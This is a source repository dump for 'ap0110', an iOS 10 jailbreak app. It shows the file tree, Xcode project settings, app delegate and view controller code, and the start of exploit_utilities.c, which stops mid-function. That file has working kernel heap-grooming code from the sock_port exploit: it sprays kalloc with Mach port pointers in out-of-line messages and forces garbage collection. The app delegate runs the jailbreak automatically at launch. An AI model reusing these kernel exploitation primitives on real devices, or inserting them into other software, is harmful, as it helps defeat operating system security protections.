├── .gitignore ├── Athenus.xcodeproj ├── project.pbxproj ├── project.xcworkspace │ └── xcuserdata │ │ └── spv.xcuserdatad │ │ └── WorkspaceSettings.xcsettings └── xcuserdata │ └── spv.xcuserdatad │ └── xcschemes │ ├── genesys.xcscheme │ └── xcschememanagement.plist ├── Athenus ├── Ap0110-1024.png ├── AppDelegate.h ├── AppDelegate.m ├── Assets.xcassets │ ├── AppIcon.appiconset │ │ ├── Ap0110-1024.png │ │ ├── Ap0110-20.png │ │ ├── Ap0110-20@2x.png │ │ ├── Ap0110-20@3x.png │ │ ├── Ap0110-29.png │ │ ├── Ap0110-29@2x.png │ │ ├── Ap0110-29@3x.png │ │ ├── Ap0110-40.png │ │ ├── Ap0110-40@2x.png │ │ ├── Ap0110-40@3x.png │ │ ├── Ap0110-60@2x.png │ │ ├── Ap0110-60@3x.png │ │ ├── Ap0110-76.png │ │ ├── Ap0110-76@2x.png │ │ ├── Ap0110-83.5@2x.png │ │ └── Contents.json │ └── Contents.json ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard ├── Info.plist ├── ViewController.h ├── ViewController.m ├── common.h ├── config.h ├── exploit_utilities.c ├── exploit_utilities.h ├── fuckyou.png ├── iosurface.c ├── iosurface.h ├── jailbreak.h ├── jailbreak.mm ├── jbresources │ ├── Cydia-10.tar │ ├── launchctl │ ├── python.tar │ └── tar ├── kernel_memory.c ├── kernel_memory.h ├── kutil.h ├── kutil.m ├── libs │ ├── libimg4tool.a │ ├── libplist++.a │ └── libplist.a ├── main.m ├── offsets.h ├── offsets.m ├── offsets.mm ├── patchfinder64.c ├── patchfinder64.h ├── pte_stuff_64.h ├── sbops.h ├── sock_port_exploit.c ├── sock_port_exploit.h ├── sugondesenuts.h ├── untethered.h └── untethered.m ├── IOKit.framework ├── Headers │ ├── IOKitKeys.h │ ├── IOKitLib.h │ ├── IOReturn.h │ ├── IOTypes.h │ └── OSMessageNotification.h ├── IOKit.tbd └── Versions │ ├── A │ └── IOKit.tbd │ └── Current ├── LICENSE ├── README.md ├── build.sh ├── img4tool ├── all_img4tool.h ├── img4.h ├── img4tool.h └── lzssdec.h ├── liboffsetfinder32 ├── img3dec.cpp ├── img3dec.hpp ├── lzssdec.cpp ├── lzssdec.hpp ├── offsetfinder32.cpp ├── offsetfinder32.hpp ├── patchfinder32.c └── patchfinder32.h ├── liboffsetfinder64 ├── all_liboffsetfinder.hpp ├── common.h ├── exception.cpp ├── exception.hpp ├── insn.cpp ├── insn.hpp ├── liboffsetfinder64.cpp ├── liboffsetfinder64.hpp ├── patch.cpp └── patch.hpp └── plist ├── Array.hpp ├── Boolean.hpp ├── Data.hpp ├── Date.hpp ├── Dictionary.hpp ├── Integer.hpp ├── Key.hpp ├── Node.hpp ├── Real.hpp ├── String.hpp ├── Structure.hpp ├── Uid.hpp ├── plist++.hpp └── plist.h /.gitignore: -------------------------------------------------------------------------------- 1 | **/.DS_Store 2 | **/._.DS_Store 3 | Payload.ipa 4 | Payload 5 | build 6 | -------------------------------------------------------------------------------- /Athenus.xcodeproj/project.xcworkspace/xcuserdata/spv.xcuserdatad/WorkspaceSettings.xcsettings: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BuildLocationStyle 6 | UseAppPreferences 7 | CustomBuildLocationType 8 | RelativeToDerivedData 9 | DerivedDataLocationStyle 10 | Default 11 | IssueFilterStyle 12 | ShowActiveSchemeOnly 13 | LiveSourceIssuesEnabled 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /Athenus.xcodeproj/xcuserdata/spv.xcuserdatad/xcschemes/genesys.xcscheme: -------------------------------------------------------------------------------- 1 | 2 | 5 | 8 | 9 | 15 | 21 | 22 | 23 | 24 | 25 | 30 | 31 | 33 | 39 | 40 | 41 | 43 | 49 | 50 | 51 | 52 | 53 | 59 | 60 | 61 | 62 | 63 | 64 | 74 | 76 | 82 | 83 | 84 | 85 | 86 | 87 | 93 | 95 | 101 | 102 | 103 | 104 | 106 | 107 | 110 | 111 | 112 | -------------------------------------------------------------------------------- /Athenus.xcodeproj/xcuserdata/spv.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | genesys.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | SuppressBuildableAutocreation 14 | 15 | 75DC305324B4CB00009152F2 16 | 17 | primary 18 | 19 | 20 | 75DC306C24B4CB01009152F2 21 | 22 | primary 23 | 24 | 25 | 75DC307724B4CB01009152F2 26 | 27 | primary 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /Athenus/Ap0110-1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Ap0110-1024.png -------------------------------------------------------------------------------- /Athenus/AppDelegate.h: -------------------------------------------------------------------------------- 1 | /* 2 | * ___ _ _ ___ 3 | * __ _ _ __ / _ \/ / |/ _ \ 4 | * / _` | '_ \| | | | | | | | | 5 | * | (_| | |_) | |_| | | | |_| | 6 | * \__,_| .__/ \___/|_|_|\___/ 7 | * |_| 8 | * 9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit. 10 | * Licensed under GPLv2, fuck v3. 11 | * Fuck manticore and iMuseum 12 | * 13 | * - with love from the Athenus Dev Team and w212. 14 | */ 15 | 16 | #import 17 | 18 | @interface AppDelegate : UIResponder 19 | 20 | @property (strong, nonatomic) UIWindow *window; 21 | 22 | 23 | @end 24 | 25 | -------------------------------------------------------------------------------- /Athenus/AppDelegate.m: -------------------------------------------------------------------------------- 1 | /* 2 | * ___ _ _ ___ 3 | * __ _ _ __ / _ \/ / |/ _ \ 4 | * / _` | '_ \| | | | | | | | | 5 | * | (_| | |_) | |_| | | | |_| | 6 | * \__,_| .__/ \___/|_|_|\___/ 7 | * |_| 8 | * 9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit. 10 | * Licensed under GPLv2, fuck v3. 11 | * Fuck manticore and iMuseum 12 | * 13 | * - with love from the Athenus Dev Team and w212. 14 | */ 15 | 16 | #import "AppDelegate.h" 17 | #include "untethered.h" 18 | #include "config.h" 19 | #include "jailbreak.h" 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | @interface AppDelegate () 27 | 28 | @end 29 | 30 | @implementation AppDelegate 31 | 32 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 33 | fun(0,0); 34 | return YES; 35 | } 36 | 37 | 38 | - (void)applicationWillResignActive:(UIApplication *)application { 39 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 40 | // Use this method to pause ongoing tasks, disable timers, and throttle down OpenGL ES frame rates. Games should use this method to pause the game. 41 | } 42 | 43 | - (void)applicationDidEnterBackground:(UIApplication *)application { 44 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 45 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 46 | } 47 | 48 | - (void)applicationWillEnterForeground:(UIApplication *)application { 49 | // Called as part of the transition from the background to the inactive state; here you can undo many of the changes made on entering the background. 50 | } 51 | 52 | - (void)applicationDidBecomeActive:(UIApplication *)application { 53 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 54 | } 55 | 56 | - (void)applicationWillTerminate:(UIApplication *)application { 57 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 58 | } 59 | 60 | @end 61 | -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-1024.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20@2x.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20@3x.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29@2x.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29@3x.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40@2x.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40@3x.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-60@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-60@2x.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-60@3x.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-76.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-76.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-76@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-76@2x.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-83.5@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-83.5@2x.png -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "size" : "20x20", 5 | "idiom": "iphone", 6 | "filename" : "Ap0110-20@2x.png", 7 | "scale": "2x" 8 | }, 9 | { 10 | "size" : "20x20", 11 | "idiom": "iphone", 12 | "filename" : "Ap0110-20@3x.png", 13 | "scale": "3x" 14 | }, 15 | { 16 | "size" : "20x20", 17 | "idiom": "ipad", 18 | "filename" : "Ap0110-20.png", 19 | "scale": "1x" 20 | }, 21 | { 22 | "size" : "20x20", 23 | "idiom": "ipad", 24 | "filename" : "Ap0110-20@2x.png", 25 | "scale": "2x" 26 | }, 27 | { 28 | "size" : "29x29", 29 | "idiom" : "iphone", 30 | "filename" : "Ap0110-29@2x.png", 31 | "scale" : "2x" 32 | }, 33 | { 34 | "size" : "29x29", 35 | "idiom" : "iphone", 36 | "filename" : "Ap0110-29@3x.png", 37 | "scale" : "3x" 38 | }, 39 | { 40 | "size" : "40x40", 41 | "idiom" : "iphone", 42 | "filename" : "Ap0110-40@2x.png", 43 | "scale" : "2x" 44 | }, 45 | { 46 | "size" : "40x40", 47 | "idiom" : "iphone", 48 | "filename" : "Ap0110-40@3x.png", 49 | "scale" : "3x" 50 | }, 51 | { 52 | "size" : "60x60", 53 | "idiom" : "iphone", 54 | "filename" : "Ap0110-60@2x.png", 55 | "scale" : "2x" 56 | }, 57 | { 58 | "size" : "60x60", 59 | "idiom" : "iphone", 60 | "filename" : "Ap0110-60@3x.png", 61 | "scale" : "3x" 62 | }, 63 | { 64 | "size" : "29x29", 65 | "idiom" : "ipad", 66 | "filename" : "Ap0110-29.png", 67 | "scale" : "1x" 68 | }, 69 | { 70 | "size" : "29x29", 71 | "idiom" : "ipad", 72 | "filename" : "Ap0110-29@2x.png", 73 | "scale" : "2x" 74 | }, 75 | { 76 | "size" : "40x40", 77 | "idiom" : "ipad", 78 | "filename" : "Ap0110-40.png", 79 | "scale" : "1x" 80 | }, 81 | { 82 | "size" : "40x40", 83 | "idiom" : "ipad", 84 | "filename" : "Ap0110-40@2x.png", 85 | "scale" : "2x" 86 | }, 87 | { 88 | "size" : "76x76", 89 | "idiom" : "ipad", 90 | "filename" : "Ap0110-76.png", 91 | "scale" : "1x" 92 | }, 93 | { 94 | "size" : "76x76", 95 | "idiom" : "ipad", 96 | "filename" : "Ap0110-76@2x.png", 97 | "scale" : "2x" 98 | }, 99 | { 100 | "size" : "83.5x83.5", 101 | "idiom" : "ipad", 102 | "filename" : "Ap0110-83.5@2x.png", 103 | "scale" : "2x" 104 | }, 105 | { 106 | "size" : "1024x1024", 107 | "idiom" : "ios-marketing", 108 | "filename" : "Ap0110-1024.png", 109 | "scale" : "1x" 110 | } 111 | ], 112 | "info" : { 113 | "version" : 1, 114 | "author" : "xcode" 115 | } 116 | } 117 | -------------------------------------------------------------------------------- /Athenus/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /Athenus/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /Athenus/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.1b3 19 | CFBundleSignature 20 | ???? 21 | CFBundleVersion 22 | 64 23 | LSRequiresIPhoneOS 24 | 25 | UIBackgroundModes 26 | 27 | audio 28 | voip 29 | 30 | UIFileSharingEnabled 31 | 32 | UILaunchStoryboardName 33 | LaunchScreen 34 | UIMainStoryboardFile 35 | Main 36 | UIRequiredDeviceCapabilities 37 | 38 | armv7 39 | 40 | UISupportedInterfaceOrientations 41 | 42 | UIInterfaceOrientationPortrait 43 | 44 | UISupportedInterfaceOrientations~ipad 45 | 46 | UIInterfaceOrientationPortrait 47 | UIInterfaceOrientationPortraitUpsideDown 48 | UIInterfaceOrientationLandscapeLeft 49 | UIInterfaceOrientationLandscapeRight 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /Athenus/ViewController.h: -------------------------------------------------------------------------------- 1 | /* 2 | * ___ _ _ ___ 3 | * __ _ _ __ / _ \/ / |/ _ \ 4 | * / _` | '_ \| | | | | | | | | 5 | * | (_| | |_) | |_| | | | |_| | 6 | * \__,_| .__/ \___/|_|_|\___/ 7 | * |_| 8 | * 9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit. 10 | * Licensed under GPLv2, fuck v3. 11 | * Fuck manticore and iMuseum 12 | * 13 | * - with love from the Athenus Dev Team and w212. 14 | */ 15 | 16 | #import 17 | 18 | @interface ViewController : UIViewController 19 | 20 | 21 | @end 22 | 23 | -------------------------------------------------------------------------------- /Athenus/ViewController.m: -------------------------------------------------------------------------------- 1 | /* 2 | * ___ _ _ ___ 3 | * __ _ _ __ / _ \/ / |/ _ \ 4 | * / _` | '_ \| | | | | | | | | 5 | * | (_| | |_) | |_| | | | |_| | 6 | * \__,_| .__/ \___/|_|_|\___/ 7 | * |_| 8 | * 9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit. 10 | * Licensed under GPLv2, fuck v3. 11 | * Fuck manticore and iMuseum 12 | * 13 | * - with love from the Athenus Dev Team and w212. 14 | */ 15 | 16 | #import "ViewController.h" 17 | #include "jailbreak.h" 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | @interface ViewController () 24 | @property (weak, nonatomic) IBOutlet UIButton *butoon; 25 | @property (weak, nonatomic) IBOutlet UISwitch *tweakswitch; 26 | @property (weak, nonatomic) IBOutlet UILabel *tweaklabel; 27 | @property (weak, nonatomic) IBOutlet UISwitch *sshswitch; 28 | @property (weak, nonatomic) IBOutlet UILabel *sshlabel; 29 | @property (weak, nonatomic) IBOutlet UISwitch *jailbreakswitch; 30 | @property (weak, nonatomic) IBOutlet UILabel *jailbreaklabel; 31 | 32 | @end 33 | 34 | @implementation ViewController 35 | 36 | extern int viewDidExecute; 37 | - (IBAction)jelbrek:(id)sender { 38 | struct utsname name; 39 | uname(&name); 40 | if (!strstr(name.version, "MarijuanARM")){ 41 | usleep(USEC_PER_SEC/100); 42 | 43 | dispatch_async(jailbreak_queue , ^{ 44 | jailbreak(); 45 | }); 46 | } 47 | } 48 | 49 | - (void)tweakChanged:(id)sender { 50 | BOOL tweaksEnabled = [sender isOn]; 51 | [[NSUserDefaults standardUserDefaults] setBool:tweaksEnabled forKey:@"tweaksEnabled"]; 52 | } 53 | 54 | - (void)sshChanged:(id)sender { 55 | BOOL sshEnabled = [sender isOn]; 56 | [[NSUserDefaults standardUserDefaults] setBool:sshEnabled forKey:@"sshEnabled"]; 57 | } 58 | 59 | - (void)jailbreakChanged:(id)sender { 60 | BOOL jailbreakEnabled = [sender isOn]; 61 | [[NSUserDefaults standardUserDefaults] setBool:jailbreakEnabled forKey:@"jailbreakEnabled"]; 62 | } 63 | 64 | 65 | 66 | - (void)viewDidLoad { 67 | [super viewDidLoad]; 68 | // Do any additional setup after loading the view, typically from a nib. 69 | if ( 70 | [[NSFileManager defaultManager]fileExistsAtPath:@"/Applications/Cydia.app/"]) { 71 | _butoon.enabled = false; 72 | _butoon.hidden = true; 73 | 74 | if ([[NSUserDefaults standardUserDefaults] boolForKey:@"notfirst"]) { 75 | [_tweakswitch setOn:([[NSUserDefaults standardUserDefaults] boolForKey:@"tweaksEnabled"])]; 76 | [_sshswitch setOn:([[NSUserDefaults standardUserDefaults] boolForKey:@"sshEnabled"])]; 77 | [_jailbreakswitch setOn:([[NSUserDefaults standardUserDefaults] boolForKey:@"jailbreakEnabled"])]; 78 | } 79 | else { 80 | UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"README" 81 | message:@"The jailbreak switch is currently disabled due to a bug, therefore it is stuck in the on position for the time being." 82 | delegate:self 83 | cancelButtonTitle:@"OK" 84 | otherButtonTitles:nil]; 85 | [alert show]; 86 | } 87 | 88 | 89 | _tweakswitch.hidden = false; 90 | _tweaklabel.hidden = false; 91 | _sshswitch.hidden = false; 92 | _sshlabel.hidden = false; 93 | _jailbreakswitch.hidden = false; 94 | _jailbreaklabel.hidden = false; 95 | 96 | [_tweakswitch addTarget:self action:@selector(tweakChanged:) forControlEvents:UIControlEventValueChanged]; 97 | [_sshswitch addTarget:self action:@selector(sshChanged:) forControlEvents:UIControlEventValueChanged]; 98 | [_jailbreakswitch addTarget:self action:@selector(jailbreakChanged:) forControlEvents:UIControlEventValueChanged]; 99 | 100 | 101 | [_butoon setTitle:@"jailbroken" forState:UIControlStateNormal]; 102 | [[NSUserDefaults standardUserDefaults] setBool:true forKey:@"notfirst"]; 103 | 104 | } 105 | /* now unnecessary */ 106 | //[[UIApplication sharedApplication] registerUserNotificationSettings:[UIUserNotificationSettings settingsForTypes:(UIUserNotificationTypeSound | UIUserNotificationTypeAlert | UIUserNotificationTypeBadge) categories:nil]]; 107 | [[UIApplication sharedApplication] registerForRemoteNotifications]; 108 | NSLog(@"viewDidLoad executed"); 109 | //viewDidExecute = 1; 110 | } 111 | 112 | - (void)didReceiveMemoryWarning { 113 | [super didReceiveMemoryWarning]; 114 | // Dispose of any resources that can be recreated. 115 | } 116 | 117 | @end 118 | -------------------------------------------------------------------------------- /Athenus/common.h: -------------------------------------------------------------------------------- 1 | #ifndef COMMON_H 2 | #define COMMON_H 3 | 4 | #include // uint*_t 5 | //#include 6 | 7 | #define LOG(str, args...) do { printf(str "\n", ##args); } while(0) 8 | #ifdef __LP64__ 9 | # define ADDR "0x%016llx" 10 | # define MACH_HEADER_MAGIC MH_MAGIC_64 11 | # define MACH_LC_SEGMENT LC_SEGMENT_64 12 | typedef struct mach_header_64 mach_hdr_t; 13 | typedef struct segment_command_64 mach_seg_t; 14 | typedef uint64_t kptr_t; 15 | #define KERN_POINTER_VALID(val) ((val) >= 0xffff000000000000 && (val) != 0xffffffffffffffff) 16 | #else 17 | # define ADDR "0x%08x" 18 | # define MACH_HEADER_MAGIC MH_MAGIC 19 | # define MACH_LC_SEGMENT LC_SEGMENT 20 | #define KERN_POINTER_VALID(val) ((val) >= 0x80000000 && (val) != 0xffffffff) 21 | typedef struct mach_header mach_hdr_t; 22 | typedef struct segment_command mach_seg_t; 23 | typedef uint32_t kptr_t; 24 | #endif 25 | typedef struct load_command mach_lc_t; 26 | 27 | #if __cplusplus 28 | #if __arm64__ 29 | #include 30 | typedef tihmstar::offsetfinder64 offsetfinder; 31 | #else //__arm64__ 32 | #include 33 | typedef CR::offsetfinder32 offsetfinder; 34 | #endif //__arm64__ 35 | #endif //__cplusplus 36 | 37 | #endif 38 | -------------------------------------------------------------------------------- /Athenus/config.h: -------------------------------------------------------------------------------- 1 | /* 2 | * ___ _ _ ___ 3 | * __ _ _ __ / _ \/ / |/ _ \ 4 | * / _` | '_ \| | | | | | | | | 5 | * | (_| | |_) | |_| | | | |_| | 6 | * \__,_| .__/ \___/|_|_|\___/ 7 | * |_| 8 | * 9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit. 10 | * Licensed under GPLv2, fuck v3. 11 | * Fuck manticore and iMuseum 12 | * 13 | * - with love from the Athenus Dev Team and w212. 14 | */ 15 | 16 | #ifndef config_h 17 | #define config_h 18 | 19 | #define TRUE 1 20 | #define FALSE 0 21 | 22 | #endif /* config_h */ 23 | -------------------------------------------------------------------------------- /Athenus/exploit_utilities.c: -------------------------------------------------------------------------------- 1 | // 2 | // exploit_utilities.c 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #include "exploit_utilities.h" 10 | #include "iosurface.h" 11 | 12 | // from Ian Beer. make a kernel allocation with the kernel address of 'target_port', 'count' times 13 | mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition) { 14 | mach_port_t q = MACH_PORT_NULL; 15 | kern_return_t err; 16 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q); 17 | if (err != KERN_SUCCESS) { 18 | printf("[-] failed to allocate port\n"); 19 | return 0; 20 | } 21 | 22 | mach_port_t* ports = malloc(sizeof(mach_port_t) * count); 23 | for (int i = 0; i < count; i++) { 24 | ports[i] = target_port; 25 | } 26 | 27 | struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg)); 28 | 29 | msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 30 | msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg); 31 | msg->hdr.msgh_remote_port = q; 32 | msg->hdr.msgh_local_port = MACH_PORT_NULL; 33 | msg->hdr.msgh_id = 0x41414141; 34 | 35 | msg->body.msgh_descriptor_count = 1; 36 | 37 | msg->ool_ports.address = ports; 38 | msg->ool_ports.count = count; 39 | msg->ool_ports.deallocate = 0; 40 | msg->ool_ports.disposition = disposition; 41 | msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 42 | msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY; 43 | 44 | err = mach_msg(&msg->hdr, 45 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 46 | msg->hdr.msgh_size, 47 | 0, 48 | MACH_PORT_NULL, 49 | MACH_MSG_TIMEOUT_NONE, 50 | MACH_PORT_NULL); 51 | 52 | if (err != KERN_SUCCESS) { 53 | printf("[-] failed to send message: %s\n", mach_error_string(err)); 54 | return MACH_PORT_NULL; 55 | } 56 | free(msg); 57 | free(ports); 58 | 59 | return q; 60 | } 61 | 62 | // Ian Beer 63 | size_t message_size_for_kalloc_size(size_t kalloc_size) { 64 | return ((3 * kalloc_size) / 4) - 0x74; 65 | } 66 | 67 | // Ian Beer 68 | mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size) { 69 | mach_port_t q = MACH_PORT_NULL; 70 | kern_return_t err; 71 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q); 72 | if (err != KERN_SUCCESS) { 73 | printf("[-] failed to allocate port\n"); 74 | return MACH_PORT_NULL; 75 | } 76 | 77 | mach_port_limits_t limits = {0}; 78 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE; 79 | err = mach_port_set_attributes(mach_task_self(), 80 | q, 81 | MACH_PORT_LIMITS_INFO, 82 | (mach_port_info_t)&limits, 83 | MACH_PORT_LIMITS_INFO_COUNT); 84 | if (err != KERN_SUCCESS) { 85 | printf("[-] failed to increase queue limit\n"); 86 | return MACH_PORT_NULL; 87 | } 88 | 89 | mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size; 90 | struct simple_msg *msg = (struct simple_msg *)malloc(msg_size); 91 | memset(msg, 0, sizeof(struct simple_msg)); 92 | memcpy(&msg->buf[0], replacer_message_body, replacer_body_size); 93 | 94 | for (int i = 0; i < 256; i++) { 95 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 96 | msg->hdr.msgh_size = msg_size; 97 | msg->hdr.msgh_remote_port = q; 98 | msg->hdr.msgh_local_port = MACH_PORT_NULL; 99 | msg->hdr.msgh_id = 0x41414142; 100 | 101 | err = mach_msg(&msg->hdr, 102 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 103 | msg_size, 104 | 0, 105 | MACH_PORT_NULL, 106 | MACH_MSG_TIMEOUT_NONE, 107 | MACH_PORT_NULL); 108 | 109 | if (err != KERN_SUCCESS) { 110 | printf("[-] failed to send message %x (%d): %s\n", err, i, mach_error_string(err)); 111 | return MACH_PORT_NULL; 112 | } 113 | } 114 | free(msg); 115 | 116 | return q; 117 | } 118 | 119 | // rest is from machswap 120 | void trigger_gc() { 121 | const int gc_ports_cnt = 100; 122 | int gc_ports_max = gc_ports_cnt; 123 | mach_port_t gc_ports[gc_ports_cnt] = { 0 }; 124 | 125 | uint32_t body_size = (uint32_t)message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024 126 | uint8_t *body = (uint8_t*)malloc(body_size); 127 | memset(body, 0x41, body_size); 128 | 129 | for (int i = 0; i < gc_ports_cnt; i++) { 130 | uint64_t t0, t1; 131 | 132 | t0 = mach_absolute_time(); 133 | gc_ports[i] = send_kalloc_message(body, body_size); 134 | t1 = mach_absolute_time(); 135 | 136 | if (t1 - t0 > 1000000) { 137 | printf("[+] got gc at %d -- breaking\n", i); 138 | gc_ports_max = i; 139 | break; 140 | } 141 | } 142 | 143 | for (int i = 0; i < gc_ports_max; i++) { 144 | mach_port_destroy(mach_task_self(), gc_ports[i]); 145 | } 146 | 147 | sched_yield(); 148 | sleep(1); 149 